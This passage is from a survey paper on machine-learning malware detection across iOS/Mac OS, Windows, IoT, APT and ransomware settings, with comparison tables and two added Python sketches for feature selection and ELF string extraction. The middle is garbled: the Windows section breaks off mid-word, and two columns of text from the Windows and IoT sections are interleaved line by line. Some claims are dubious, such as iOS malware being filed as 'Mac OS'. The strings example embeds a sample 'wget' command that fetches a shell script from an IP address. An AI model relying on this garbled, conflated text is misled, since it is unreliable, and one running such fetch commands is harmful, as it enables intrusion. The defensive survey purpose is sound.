Enck et al. (2014) [150] | Private sensitive information | Android | TaintDroid
Spreitzenbarth et al. (2014) [155] | Manifest of app | Android | Mobile-Sandbox
Zhou et al. (2012) [152] | Behaviour and heuristic | Android | DroidRanger
Zheng et al. (2012) [153] | Behaviours of automatic user interface interactions | Android | SmartDroid

5.2.2. iOS malware detection techniques

The Mac OS environment is more secure than other environments such as Windows and Android [5]. In 2019, 107 malicious samples were programmed to break Mac OS. Because there are no malware defence systems, it is crucial to focus on Mac OS. Many distinct malware families steal confidential information from iOS devices. According to Shannon's report, watering-hole spyware, an iOS zero-day malware, was reported in 2019. It can grab private information such as iMessage photos and GPS locations [169]. In the same year, researchers also found OceanLotus, a new iOS malware that uses cutting-edge tactics to evade malware analysis.
Similarly, the Exodus malware collects phone contacts, audio recordings, photos, videos, GPS locations, and device information [170]. It spreads via phishing websites that impersonate mobile carriers in Italy and Turkmenistan. FinSpy is a similar spyware capable of stealing confidential information such as SMS or MMS messages, phone call records, emails, phone contacts, files, videos, and GPS locations [171]. According to Kaspersky's report, users in Myanmar were targeted for spying with the latest versions of the FinSpy variants for iOS and Android devices.
In 2019, Trojans held the top spot with a 59.87% share, while backdoors, in second place with 34.66%, pose serious security risks [5]. The list shows that Trojans and backdoors dominate because of their rapid proliferation. The Flashback Trojan, accounting for 38.36%, has various variants that have infected Mac OS over the last 10 years. It exploits Java: once Java is enabled in browsers, it activates and spreads, reading passkeys through keyloggers. Because it has existed for ten years and is still active, more research is needed to understand Mac OS malware.
In the Apple environment, the ISAM malware model [172] performs wireless infection and self-propagation among iPhone devices. Its six integrated malicious payloads connect to a bot-master server to update the programming logic [173]. iOS malware features are explored and, after classification, 36 iOS malware families are identified between 2009 and 2015. These results are also disseminated to legitimate markets and used to reduce infections of iOS devices. By incorporating Machine Learning techniques and an opcode-oriented feature set, the method in [174] detects attacks from malicious iOS samples. Analysing the applications produces a histogram in which each dimension counts how many times the corresponding opcode appears in the code. The OneR algorithm, with a precision of 0.971 and a recall of 1, classifies the samples as malicious or benign.
Research works concentrate on open problems, such as the theft of users' sensitive confidential information, that still need to be resolved [175]. To address this, remedial dynamic analysis suited to iOS environments is used to propose solutions for iOS applications. Assessment processes focus on the need for user interfaces during dynamic analysis of iOS apps [176]. A high-interaction honeypot is implemented on Mac OS X, and more than 6000 blacklisted URLs are evaluated to predict malware spread in Mac OS X.
A kernel-based SVM is applied to detect Mac OS malware using library calls [177]. A dataset of 152 malicious and 450 legitimate files is used for both training and testing, with general supervised learning. The system attains a detection accuracy of 91% and an FPR of 3.9%. The Synthetic Minority Over-sampling Technique (SMOTE) is also used; with SMOTE, the accuracy increases to 96%, and the FPR stays below 4%.
Android and iOS Mobile Banking Applications (MBAs) of various banks are analysed comprehensively using hybrid analysis, and a threat model called Vulnerability Assessment and Penetration Testing of Android and iOS Mobile Banking Apps (VAPTAi) is proposed [178]. The systematic investigation shows that MBAs can be affected by Man-in-the-Middle (MitM) attacks. A few MBAs were observed to use plain HTTP to transfer data without any security features, and in many cases MBAs accept forged or self-signed certificates, which leads to SSL or TLS MitM attacks.
ChanDet [179], a channel model, is introduced on the basis of five conditions by analysing the complete operation method and comparing the similarities and differences of several applications. It found that iMessage lacks confidentiality, which implies it is not a potential channel, and it provides a way to test whether an application is a potential channel. Inspired by the phylogenetic concept, an iOS malware classification method based on mobile behaviour and vulnerability exploitation is implemented [103]. Hybrid analysis is applied in the experiments, and a proof of concept (POC) demonstrates the significance of the proposed iOS malware classification for malware detection.
iOS Chameleon apps are studied systematically in [180], and the Chameleon-Hunter detection tool is used to discover PHI-UIs with a semantic feature set built through nontrivial techniques. Chameleon-Hunter is a static analysis-based method that identifies malicious PHI-UIs. Among 28,000 iOS apps on the App Store, 142 Chameleon apps were found to be involved in malicious activities. After the issues were disclosed to Apple, most of these Chameleon apps were removed or their suspicious UIs were disabled. Chameleon-Hunter is highly effective, achieving a precision of 92.6% and a recall of 94.7%.
These research works also show the unpredictability of OS X malware. A few malware families use complicated approaches to threaten OS X users, and many of them are not successful; however, they can still disrupt tasks by causing reboots. Important features of iOS mobile malware detection techniques are listed in Table 5.

Table 5
Comparison of recent iOS mobile malware detection techniques using ML.
Research paper | Features | Type of malware | Algorithms of classification
Lee et al. (2021) [180] | iOS Chameleon apps, UI-based illicit activity threats, suspicious PHI-UI | Mac OS | Chameleon-Hunter
Husainiamer et al. (2020) [103] | Mobile behaviour and vulnerability exploitation | Mac OS | POC
Zhou et al. (2019) [179] | iMessage | Mac OS | ChanDet
Pajouh et al. (2018) [177] | Library calls | Mac OS | Kernel-based SVM, SMOTE
Bojjagani et al. (2017) [178] | Mobile banking apps | Android and iOS | VAPTAi
Cimitile et al. (2017) [174] | Opcode histogram | Mac OS | OneR
García et al. (2016) [173] | Malware families | Mac OS | KeyRaider analysis, IDA, Hopper
Lindorfer et al. (2013) [176] | Mac OS X | Mac OS | iHoneypot

5.3. Windows malware detection techniques

According to the CVE database, over 660 official cases concerning system security risks were recorded in the previous year [5]. Windows 10 was affected by 357 vulnerabilities, and high levels of security breaches were also identified in Windows Server 2016 and Windows Server 2019. In the first quarter of 2020, Windows 10 accounted for 51.38% of usage worldwide, while Windows 7 retained 30% despite its security loopholes. Exploiting Windows vulnerabilities is the primary goal of cybercriminals. Furthermore, backdoors in the OS and firmware of devices compromise the entire security environment. IBM rose from 6th to 2nd place among the top 10 manufacturers with security breaches in 2019, a list that also includes popular companies such as Google, Oracle, Adobe, and Cisco. More than 342 vulnerable cases were registered for Adobe Reader. Compared with the previous year, the share of Windows Trojans increased by 35% in 2019, reaching 64.31% of all malware. Ransomware, bots, crypto miners, and password Trojans are also on the list of attacks.
Various detection methods have been implemented for Windows malware. Detection of unknown malware in the Windows OS environment is achieved by a malware detection framework based on active learning [181], in which a Support Vector Machine classifier classifies all unknown samples as legitimate or malicious. In the runtime environment, unknown

sample files are analysed and categorized by a model that employs both static and dynamic analysis techniques [182]. Static analysis examines the binary data to define a feature module, and dynamic analysis determines the behaviours. ML classifiers then use the results of both analyses to classify each sample as benign or malicious.
A hybrid analysis-based malware detection model is developed in [183] for detecting botnets of 8 bits size. In the Windows OS environment, it helps detect malware samples using both static and dynamic analysis techniques. The article [184] proposes a Windows malware detection model that uses features such as strings and n-grams; ML models classify the malware, and the features are retrieved by running the files in a runtime environment. A Windows malware detection system is also implemented using a directory of the dependent files of prefetched files [185]. It attains a minimum false-positive rate of 0.001 and is described as a lightweight behaviour-based malware detection method. For quick dynamic de-

5.4. IoT malware detection techniques

The prevalence of malware on connected Linux devices has doubled in the IoT context. According to a SonicWall analysis, 57 million IoT malware attacks were discovered in the first half of 2022, up 77% from the previous half [57]. The growth curve of malware development in the IoT environment is still rising [190]: more than 400,000 (4 lakh) samples were produced in 2019, compared with nearly 200,000 (2 lakh) in 2018. Trojans occupy the top place with a 41.78% share of infections. Mirai holds first position among the top ten malware. It drew global attention due to the catastrophic DDoS attack on major web services such as Twitter, Amazon, Dyn, and Spotify, and on the routers of Deutsche Telekom. IoT device manufacturers have done little to raise awareness of this threat, and Mirai continued to create and spread botnets throughout 2019 [5].
Novel code and techniques are injected to generate new samples, for example to access the functions of Industrial IoT (IIoT). Cyber thieves use DDoS attacks to exploit loopholes in the security system. Crypto miners also target the unsecured in-
tection of malware, a framework namely a hybrid multi-filter is frastructure of IoT. New IoT malwares are generated as a result of
implemented to identify the behaviours of the runtime environ- these and make the defence of internet-connected devices ques-
ment [186]. Various hybrid algorithms are utilized by combining tionable. Gafgyt, a Trojan that ranks second globally with 15.04%
the filtering methods like low redundancy and fisher relief F of infections, and Tsunami and Hajime are also responsible for
score. SVM wrapper is used for increasing the relevance level. the destruction of IoT networks. Coinhive is a crypto miner that
To observe and identify strange risks related to energy con- targets IoT apps. Code written in JavaScript is utilized for com-
puting browser-oriented digital currency business services. With
servation, a power-aware malware detection framework is pro-
the comparison of 2020 results, sample counts have increased by
posed [187]. It is framed with a combination of a power monitor
46% from 2019 [5]. Machine learning is used in malware analysis
and data analyser. Power samples are collected, and energy con-
because it eliminates the need to acquire signatures for each type
sumption history is created by the power monitor wherein the
of malware for each detection technique, which aids in resolving
data analyser is utilized for power signature creation. By using
some complications. The Basic IoT malware detection method
noise-filtering and data-compression methods, power signatures
with the utilization of different ML classifiers is depicted in Fig. 7.
are produced, reducing the difficulty of detection. HP iPAQ is
Security-providing organizations implement two key methods
utilized for experimental purposes over the Windows OS mo-
for detecting malwares, which are matching the signatures and
bile environment. Malicious code analyser Cuckoo sandbox is
analysing based on heuristics [191]. The heuristic-based analysis
utilized for analysing malware samples [49] in a Windows OS
approach becomes less effective as it is evaded by the size of
environment where two distinct methodologies are deployed —
the IoT setup and utilization of approaches. An immediate de-
one for feature extraction and the other for behaviour analysis.
tection method is required for protecting the networks of IoT
Genetic algorithms are utilized for extracting features and for
without any delay [192]. IoT environment-related threats and
classification purposes, 3 classifiers are used — SVM, Naïve Bayes, deployment of tools, and techniques against attackers are detailed
and RF. This system attains classification accuracy with SVM at [193,194]. CNN is utilized for detecting IoT malware by trans-
81.3%, NB at 64.7%, and RF at 86.8%. ferring binaries into grayscale images [195]. Malware detection
Recently windows malware forensic analysis methods are pro- traffic is analysed using the Bayesian model updating method
posed without applying any ML techniques [188,189]. A compre- and the result is compared with ML classifiers like KNN and
hensive method is presented to renovate/retrieve vital informa- SVM [45]. The K-Means Clustering algorithm is utilized for finding
tion associated with malicious programs from different hidden the abnormality of the power indulgence prototype to detect IoT
locations of the windows system that expose the traces of ma- malware [196]. Machine learning classifiers have been utilized
licious programs using available remnants of a computer [188]. by multiple research communities to detect IoT malwares for the
Analysing procedures for various Windows 10 artefacts are of- past few years. Machine learning models are trained for malware
fered, as techniques for looking into the digital footprints of prediction by concentrating categorization over existing malware
suspect computers. Experiments are carried out for discovering samples [107] in which various methods utilized for choosing
the traces of deleted or existing malicious programs. Remote Ac- features are also detailed. Furthermore, classification algorithms
cess Trojan (RAT) families are studied comprehensively between like ANN, Decision Tree, and SVM are also discussed. Further, data
1996 and 2016 [189]. On the basis of the study RATSCOPE is privacy protection methods like secure offloading, access control
proposed which is a forensic system. It is capable of recording and and authentication are concentrated [197].
precisely reconstructing RAT attacks making use of the semantics A cross-platform approach to analysing IoT malware where
of windows in a fine-grained manner. A novel Aggregated API printable strings are first extracted from ELF files after IoT mal-
Tree Record Graph (AATR) model is proposed for classifying PHFs ware collection [198]. Printable strings are utilized as a cross-
of RATs by enhancing the performance and quality of intrinsic platform feature for identifying IoT malware over different plat-
Event Tracing for Windows (ETW). Test results of RATSCOPE beat forms. ML algorithms are incorporated to verify the ability of
earlier forensic systems by achieving 90% TPR (True Positive Rate) strings in the classification of malware families of cross-platform
over cross-family evaluation and 80% TPR over 2 years spanning environments. Based on the results, 99% accuracy is attained in a
temporal evaluation. Runtime overhead is gained as 3.7% which similar platform of training and testing with the data set which
is very low. Table 6 depicts the comparison of recent Windows contains 120k IoT malware executable files. For different IoT plat-
malware detection techniques using ML. forms, 96% accuracy is attained. A unified IoT malware detection
16
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Table 6
Comparison of recent Windows malware detection techniques using ML.
Research paper Features Type of malware Algorithms of classification
Yang et al. (2020) [189] AATR, ETW Windows RATSCOPE
D. S et al. (2020) [188] Footprints Windows comprehensive method
Irshad et al. (2019) [49] Cuckoo sandbox Windows SVM, Naïve Bayes, and RF
Huda et al. (2018) [186] Behaviours of a runtime environment Windows Hybrid-multi filter-wrapper framework, SVM wrapper
Alsulami et al. (2017) [185] Directory of dependent files Windows Lightweight behavioural malware detection
Mithal et al. (2016) [184] Strings and n-grams Windows ML
Satrya et al. (2015) [183] Malware behaviours Windows Hybrid analysis
Shijo et al. (2015) [182] Behaviours Windows ML
Nissim et al. (2014) [181] Active learning Windows SVM

Fig. 7. IoT Malware detection using ML classifiers.

method is proposed by focusing on the detection of IoT malware are involved for capturing, analysing and reporting in the time
at the node level as well as the network level [199]. For node- period of 7 months and better results are obtained.
level malware detection, a Lightweight runtime malware detector To detect DDoS attacks in IoT networks, SDN-based framework
is deployed which works with Hardware Performance Counter is proposed by using SDNWISE customized controllers [202].
(HPC) values. To resolve the malware imprisonment problem of
Other than IoT device vulnerabilities, malicious traffic of IoT net-
IoT networks, heuristic end-to-end detection and defence ap-
works is also investigated at an earlier stage by analysing packet
proaches are implemented. The scalability of network topology
is maintained making use of multi-attribute graph translation. logs employing the IP packet counter and IP payload detection
Recently without applying ML techniques, IoT-based secure approaches which are deployed over the SDNWISE controller.
patching framework (IoT-Proctor) is proposed with various net- Massive traffic between nodes is induced by configuring part
work isolation levels to moderate and control device-to-device of the model’s nodes in the COOJA simulator, which is used to
(D2D) malware propagation [200]. Identification of compromised develop software-defined IoT networks. While considering the
devices and malicious activity origin is performed using remote results of the DDoS attack detection framework, 98% accuracy and
attestation. In addition, virtual patching is proposed through 100% detection rate are attained with a low false +ve rate.
physical unclonable functions (PUFs) to avoid malware spread. To mitigate the critical impacts of IoT botnets, ML-based IDS
The SEIR (susceptible, exposed, infected, and resistant) model
is developed with the aim of accurate IoT botnet malware detec-
is utilized for representing the levels of isolation and perfor-
tion [203]. Feature set minimization is focused and implemented
mance evaluation. These types of studies are done using an
access control logic model, which reduces patching time and for ML tasks by formulating 6 distinct binary and multi-class
improves framework performance. Similarly another framework classification problems on the basis of botnet life cycle stages.
namely IoT-BDA is also developed without the involvement of ML For every classification problem, an optimal feature set is ob-
techniques. tained by applying filter and wrapper methods with chosen ML
IoT Botnet Detection and Analysis (IoT-BDA) framework is an methods. Based on experimentation results high detection rates
automated manner to capture, analyse, identify and report IoT are achieved in a restricted number of features and wrapper
botnets [201]. For providing support towards a broad range of methods outperform filter methods in terms of performance.
hardware and software configurations honeypots are integrated Channel-based features are preferred during the feature selection
with novel sandboxes in the framework. In addition, it involves stage of post-attack detection. N-BaIoT and Med-BIoT datasets are
discovering Indicators of Compromise (IoC) and Indicators of
used for the experimentation purposes. DT-based SBS (Sequential
Attack (IoA) with in-depth analysis by implementing the tech-
Backward Selection) offers excellent detection accuracy in a short
niques of anti-analysis, persistence and anti-forensics. The need
for multi-architecture botnet analysis is ensured because 52% of amount of time; for the N-BaIoT dataset with 9 class classification
the botnets are adopted with evading techniques for hiding C2 types, this accuracy was obtained at 99.57%. Table 7 compares the
communication and 67% of botnets are targeting several CPU ar- recent techniques implemented for Machine Learning based IoT
chitectures. For experimentation 4077 distinct IoT botnet samples malware detection.
17
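Sequential Backward Selection, the wrapper method behind the best result in [203], can be sketched in a few lines. This is a minimal illustration under stated assumptions, not the authors' implementation. The scoring function is supplied by the caller; in a setting like [203] it would train a decision tree on the candidate subset and return its detection accuracy. The function name and the toy feature weights below are hypothetical.

```python
from typing import Callable, FrozenSet, List, Sequence, Tuple

# A scorer maps a candidate feature subset to a quality value (higher is better).
# Hypothetical: in practice this could be the validation accuracy of a decision
# tree trained on only the features in the subset.
Scorer = Callable[[FrozenSet[str]], float]


def sequential_backward_selection(
    features: Sequence[str], score: Scorer, k: int
) -> Tuple[FrozenSet[str], List[Tuple[FrozenSet[str], float]]]:
    """Greedy SBS: start from all features and drop one feature per step.

    At each step, every subset with exactly one feature removed is scored and
    the best one is kept, until only `k` features remain. Returns the final
    subset and the search path as (subset, score) pairs.
    """
    if not 1 <= k <= len(features):
        raise ValueError("k must be between 1 and the number of features")
    current = frozenset(features)
    path = [(current, score(current))]
    while len(current) > k:
        # Score each candidate obtained by removing a single feature.
        candidates = [(current - {f}, score(current - {f})) for f in sorted(current)]
        # max() returns the first best candidate, so ties follow sorted order.
        current, best = max(candidates, key=lambda c: c[1])
        path.append((current, best))
    return current, path


if __name__ == "__main__":
    # Toy scorer with made-up weights: two informative features, two noisy ones.
    weights = {"pkt_rate": 0.5, "dst_port": 0.3, "ttl": -0.1, "payload_len": 0.05}
    chosen, steps = sequential_backward_selection(
        list(weights), lambda s: sum(weights[f] for f in s), k=2
    )
    print(sorted(chosen))  # ['dst_port', 'pkt_rate']
```

Each step scores every remaining feature. The total cost therefore grows roughly quadratically with the number of features, multiplied by the cost of one model fit. This is the usual price wrapper methods pay for outperforming cheaper filter methods, as they did in [203].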

Table 7
Comparison of recent IoT malware detection techniques using ML.
Research paper | Features | Type of malware | Algorithms of classification
Kalakoti et al. (2022) [203] | Botnet life cycle stage, wrapper methods, Channel based features | IoT | ML based IDS
Bhayo et al. (2022) [202] | DDoS attack, SDNWISE customized controllers, IP packet counter and IP payload, COOJA simulator | IoT | SDN based framework
Trajanovski et al. (2021) [201] | IoC and IoA, in-depth analysis, multi architecture botnet analysis | IoT | IoT-BDA
Aman et al. (2021) [200] | Remote attestation, PUFs, SEIR model-based isolation | IoT malware | IoT-Proctor
Dinakarrao et al. (2020) [199] | HPC values | IoT malware | Multi-attribute graph translation
Lee et al. (2020) [198] | ELF files | IoT malware | ML algorithms
Wu et al. (2019) [45] | Bayesian model | IoT malware | KNN and SVM
Papafotikas et al. (2019) [196] | K-Means Clustering | IoT malware | ML
Al-Asli et al. (2019) [191] | Heuristics | IoT malware | ML
Pajouh et al. (2019) [192] | Heuristics | IoT malware | Two-tier classification
Azmoodeh et al. (2018) [204] | Power consumption prototypes | IoT malware | KNN
Xiao et al. (2018) [197] | Control methods | IoT malware | ML
Su et al. (2018) [195] | Images | IoT malware | CNN
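The cross-platform feature used by Lee et al. [198] (the "ELF files" row in Table 7) is the set of printable strings in each binary. The sketch below shows one plausible way to extract those strings and turn them into a binary feature vector. The four-character minimum mirrors the default of the Unix `strings` tool. The vocabulary-based encoding and the function names are illustrative assumptions rather than details reported in [198]. Because the code scans raw bytes, it works the same for ELF files compiled for ARM, MIPS, x86, or any other architecture.

```python
import re
from typing import List, Sequence


def printable_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Return runs of printable ASCII (plus tab) that are at least `min_len` long.

    Works on raw bytes, so it is independent of the CPU architecture an ELF
    binary was compiled for.
    """
    if min_len < 1:
        raise ValueError("min_len must be at least 1")
    # 0x20 (space) to 0x7e (tilde) is printable ASCII; tab is accepted as well.
    pattern = re.compile(rb"[\x20-\x7e\t]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def string_features(data: bytes, vocabulary: Sequence[str], min_len: int = 4) -> List[int]:
    """Binary bag-of-strings vector: 1 if a vocabulary string occurs in `data`.

    The vocabulary is hypothetical here; it would typically be built from
    strings observed in the training set.
    """
    present = set(printable_strings(data, min_len))
    return [int(s in present) for s in vocabulary]


if __name__ == "__main__":
    sample = b"\x7fELF\x02\x01\x01\x00/bin/busybox\x00\x01wget http://198.51.100.7/x.sh\x00ab\x00"
    print(printable_strings(sample))  # ['/bin/busybox', 'wget http://198.51.100.7/x.sh']
    print(string_features(sample, ["/bin/busybox", "/proc/net/tcp"]))  # [1, 0]
```

Note that the ELF magic "ELF" and the trailing "ab" are dropped because they are shorter than four characters. In practice, the resulting vectors would be passed to whatever ML classifier is being evaluated.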

5.5. APT detection techniques

An advanced persistent threat (APT) is a sophisticated, stealthy threat actor and a highly dangerous kind of threat that should be proactively prevented. APTs target the most valuable information of legitimate users and cause them financial harm. Various machine learning techniques are used to detect advanced persistent threats. MLAPT detects and forecasts APTs in three phases [205]. The first phase detects threats with 8 sub-modules that analyse traffic in real time. In the second phase, alerts are correlated, and the results of the first phase are used to determine each alert's type. In the final phase, ML algorithms forecast the attack, which helps to detect the threat earlier. MLAPT reaches a maximum accuracy of 84.8% with a low false-positive rate. An APT attack typically relies on a bot on the target to collect sensitive data, and signature-based methods cannot detect it. In [206], APT assessment is implemented on the Hadoop platform by building a dedicated search engine. Bot-infected systems access HTTP-related information such as cookies to obtain confidential data, and HTTP-based command and control (C&C) is used to retain control of the affected system.

SPuNge [207] detects APTs by combining clustering and correlation to identify the system hosting the root infection. Threat information about the attack's targets and their anticipated vulnerable behaviours helps identify an impending attack. The attacked location is determined by mapping this information with K-means. SPuNge detects collections of malicious hyperlinks that share similar domains. A domain graph-based APT detection scheme is proposed for an information-centric IoT environment [208]. It identifies the connections between malware-infected domains and their respective IP addresses. The domain graphs are built from highly connected subgraphs, keeping computation and resource consumption to a minimum. Experiments show better accuracy, and the scheme is applicable to sensor networks in IoT environments.

An APT defence mechanism based on the concept of dynamic deception is proposed in [209]. It implements a messaging system that applies socket-based encryption and decryption mechanisms to authenticate legitimate users. SM4 is used to create dynamic IP addresses, and a Viterbi algorithm-based timing selection method is applied dynamically. Together, these two techniques resolve the issues of dynamic policy generation. Dynamic policy allocation is implemented with Dynamic Host Configuration Protocol version 6 (DHCPv6). Finally, strategies are generated and policies are assigned dynamically. For detecting APT-based malicious Open XML documents, an intelligent framework designed for flexibility and ease of configuration is proposed in [210]. It generates reports that highlight relevant information about the analysed Open XML documents without manual intervention, and a configurable scanner module detects the APT. The APT-EXE dataset [211] consists of 9376 execution logs retrieved from 2010 APT campaign materials, and statistical analysis is applied to it. The approach is applicable to detecting general Windows APTs. An optimized feature set is obtained iteratively from the accessed locations, file types, and operations. When 152 samples from campaigns in 2018 and 2019 are tested, a sensitivity of 0.7697 is achieved for detecting runtime events. To defend against APT attacks, Su [212] proposes a game theory-based model that addresses issues related to APT attack paths. A defensive network security architecture is designed based on an analysis of the attackers' attack paths. Subsequently, an attack path prediction model (OAPG) is built on game theory and evaluated with an APT attack instance.

APT attacks based on time synchronization are a dangerous threat [213]. To simulate them for security research, two devices are proposed: a programmable Man-in-the-Middle (pMitM) and a programmable injector (pInj). These devices allow various kinds of attacks to be implemented on Precision Time Protocol (PTP) networks. Based on APT attack guidelines and emerging detection technology, an APT attack analysis framework is proposed in [214]. It repeatedly matches collected data against manually built cyber security knowledge graphs. To link new knowledge with past knowledge and provide real-time network security status, the framework uses self-defined rules. It involves many manual activities, which could introduce human errors that automation could mitigate. An enhanced APT response system is proposed in [215], in which anomalous changes in the system are monitored by a real-time Anti-Malware Host Intrusion Detection System (AMHIDS). It prevents APT attacks cost-effectively while taking into account security measures related to government operations.

A recent APT defence mechanism based on data backup and recovery (DBAR) techniques [216] addresses issues in the software-defined networking (SDN) paradigm without employing ML techniques. It addresses the DBARS problem, whose aim is to identify a cost-effective DBAR technique. A dynamic model describes the evolution of the predicted security status of an organization's network. The problem is then reduced to a differential game-theoretic problem, and its optimality system is derived using the Nash equilibrium solution concept to obtain a cost-effective DBAR technique.

To optimize the defence of IoV networks and model the interactions among various kinds of attackers, Halabi et al. [217] develop a repeated Bayesian Stackelberg game. They investigate distributed sophisticated attacks in the Internet of Vehicles (IoV) and highlight the severe impact of APTs. Risk assessment at the roadside unit (RSU) level predicts the probability of various attack types across the IoV network. The game integrates the results of this risk assessment phase to create a defence system with an optimal mixed strategy. To improve attack detection, the Decomposed Optimal Bayesian Stackelberg Solver (DOBSS) is used to solve the game. The aim is to balance the IoV defence workload while limiting degradation of service delivery performance.

Al-Saraireh et al. [218] propose an APT detection model based on eXtreme Gradient Boosting (XGB) and variance feature selection-based analysis. A new dataset is created from the various APT stages: normal (stage 0), reconnaissance (stage 1), initial compromise (stage 2), lateral movement (stage 3), and data exfiltration (stage 4). The strategies, techniques, procedures, and Indicators of Compromise (IoC) of APTs are also considered during dataset generation. The resulting dataset is then used to apply the proposed ML model. The ANOVA feature selection method chooses the best feature subset, and the model achieves an accuracy of 99.89% using only 12 of the dataset's 65 features. Table 8 summarizes recent APT detection techniques based on Machine Learning.

Table 8
Comparison of recent APT detection techniques using ML.
Research paper | Features | Type of malware | Algorithms of classification
Al-Saraireh et al. (2022) [218] | ANOVA, 5 stages, variance feature selection method | APT | XGB based
Halabi et al. (2021) [217] | IoV, optimal mixed strategy, DOBSS | APT | Bayesian Stackelberg Game
Yang et al. (2021) [216] | SDN, game-theoretic problem, Nash equilibrium solution | APT | DBAR
Hong et al. (2021) [215] | Changes in system | APT | AMHIDS
Qi et al. (2020) [214] | Self-defined rules and MapReduce | APT | Cyber security knowledge graph
Alghamdi et al. (2020) [213] | pMitM, pInj | APT | –
Su (2020) [212] | APT attack paths | APT | Game theory, OAPG
Coulter et al. (2020) [211] | APT-EXE | APT | –
Liu et al. (2019) [209] | Socket based | APT | SM4 + Viterbi algorithm
Ma et al. (2019) [208] | IP address | APT | Large-Scale Domain Graph
Sun et al. (2019) [210] | Open XML documents | APT | Framework
Ghafira et al. (2018) [205] | Traffic in a real-time environment | APT | MLAPT
Balduzzi et al. (2013) [207] | K means | APT | SPuNge

5.6. Ransomware detection techniques

Protection against ransomware is among the most laborious tasks. Most ransomware attacks target naïve users who do not keep backups, and attackers use these victims as a source of revenue [5]. Ransomware can appear benign and is difficult to detect because it blends into its environment [219]. Zero-day attack protection techniques are therefore important for automatic ransomware detection.

Anti-ransomware systems typically aim to prevent damage, protect against zero-day ransomware attacks, and raise user awareness. Ransomware is believed to use evasion mechanisms such as delayed execution, self-destruction, polymorphism, and network traffic encryption [220]. A simple action such as clicking a malicious link or opening a spam email attachment can deliver the malware payload and result in a ransomware attack [221]. Because of the nature of ransomware, standard malware detection methods are insufficient, and further improvement of detection capabilities is required.

CryptoDrop [219] provides early indications of a ransomware outbreak by tracking changes to user files and data in real time. It relies on specific file-system attributes that are relevant to most crypto-ransomware. Extensive behavioural analysis identifies these attributes as primary and secondary indicators. Changes in the file system, hash similarity, and Shannon entropy are the primary indicators. File deletion and file-type funnelling are the secondary indicators. CryptoDrop achieves a 100% true positive rate (TPR), a 1% false positive rate (FPR), and an overhead of 1–16 ms.

UNVEIL [222] automatically creates a virtual environment that imitates the user's environment. It presents two detection techniques, one for file lockers and one for screen lockers. File lockers target the files on the victim's system, so UNVEIL monitors the system's file system accesses. Screen lockers deny the user access to the system. To detect them, UNVEIL compares screenshots of the desktop taken before, during, and after running the malware sample, and uses their dissimilarity scores to find locked desktops. In the experiments, UNVEIL achieves a 96.3% TPR at zero false positives.

R-Locker [223] is based on deception: a honey file trap implemented in a FIFO manner blocks ransomware. A maximum degree of dependency on the OS is considered one of its features. It needs no pre-training, targets zero-day attacks, and achieves 100% TPR and 0% FPR. The method in [224] identifies zero-day attacks by applying both behaviour detection and anomaly detection. Classifiers such as SVM analyse behaviour and generate predictions. A majority-voting strategy merges the classifier outputs, and OR logic combines the anomaly-based predictions. The experiments report 99% TPR and 2.4% FPR.

The method in [225] uses the characteristics of human file handling as a whitelist and focuses on the differences between "humanness" and "ransomwareness". By prohibiting file deletion and overwriting, it prevents files from being encrypted by crypto-ransomware; it is implemented to protect text files. For encrypting ransomware, a context-aware entropy analysis-based detection method is implemented in [226]. It observes that the header fields of files encrypted by ransomware have higher entropy than the headers of normal, legitimate files, and uses this information to detect abnormal behaviour. The experiments report 100% TPR and 0% FPR.

RWGuard [227] detects crypto-ransomware in real time using three monitoring techniques: trap monitoring, file-change monitoring, and monitoring of running processes. To detect changes to a file, it tracks a number of indicators, including entropy, similarity, and changes in file type and size. A threshold value is computed from these changes. When classifying samples as legitimate or malicious, it profiles their encryption behaviour. RWGuard achieves 100% TPR, 0.1% FPR, and an overhead of 1.9 ms.

ShieldFS [228], a runtime ransomware detection system, uses supervised classifiers trained on the input–output request packets (IRPs) collected from benign and malicious systems. Two distinct kinds of classification models are developed, one system-based and one process-based. Each classifier is trained over various levels of file assessment. ShieldFS achieves 99%–100% TPR, 0–0.2% FPR, and 0.3–3.6x overhead across the reported experiments. To recover from ransomware damage, [229] proposes mitigation methods that guarantee data reliability and accessibility by observing the IRP of every user file. A mini-filter driver effectively prevents attackers from reading or writing files, and the experiments report 100% TPR and 0% FPR. RedFish [230] is a network traffic monitoring-based algorithm that identifies ransomware activity and stops it from spreading to shared documents. It monitors basic ransomware activities such as file modification through read or write operations, content removal, and overwriting. It is trained on traces of benign and malicious network activity. Like the previous work, RedFish achieves 100% TPR and 0% FPR.

An SDN-based detection method that analyses HTTP request and response messages is proposed in [231,232]. An HTTP traffic analyser extracts and pre-processes HTTP packets and reconstructs information such as the server, size, and IP. The method in [233] detects ransomware by combining features from static and dynamic analysis. For static analysis, file deception is implemented by placing trigger programs with honey files in an artificial network. In addition, network packets are observed and features are mined from packet headers to create a dataset for malicious behaviour detection. NetConverse [234] applies Machine Learning to network traffic information, using a Decision Tree classifier to trace the parameters of a ransomware-affected system. NetConverse achieves 95% TPR and 1%–6% FPR.

Security measures that guard against ransomware attacks on flash-based storage devices are designed in [235]. Pattern-based detection identifies the type of ransomware. Ransomware activity is monitored by tracking operations such as file reads and writes through the buffer management policy. To protect NAND flash-based Solid State Drives (SSDs) against ransomware, a security approach is implemented in [236]. Features including the block address, its size, and its type are used to determine the precise details of ransomware activity. Impacted files are recovered by constructing a Flash Translation Layer (FTL), which avoids delays in ransomware detection but imposes an extra burden on the SSD. The experiments report 100% TPR and 0%–5% FPR.

A method based on Grand Unified Regularized Least Squares (GURLS) is proposed for ransomware detection in [237], using supervised learning with the Regularized Least Squares algorithm. It is trained on features such as the regularity of API calls and strings. Combined with a Radial Basis Function kernel, it provides an adequate level of detection. The experiments report 87.7% TPR and 7.5% FPR. A hybrid Android ransomware detection and mitigation method is proposed in [238]. It considers opcode frequency in static analysis and memory, network, and CPU usage in dynamic analysis. The 2-gram opcode frequencies are the input to a binary classifier, and the experiments report 100% TPR and 4% FPR.

R-PackDroid [239] prevents ransomware attacks on Android phones using ML. API packages are used for feature extraction, and a Random Forest classifier classifies the distinct ransomware based on the training results. R-PackDroid achieves 97% TPR and 2% FPR. For IoT environments, a ransomware detection method based on power consumption prototypes is implemented in [204]. KNN provides high detection accuracy using time and similarity measures, achieving 95.65% TPR. The work in [240] suggests that ransomware can be detected by looking for anomalies in file directory activity, together with storage use, processor use, and I/O rates. Testing is performed with a single custom ransomware sample developed specifically for research.

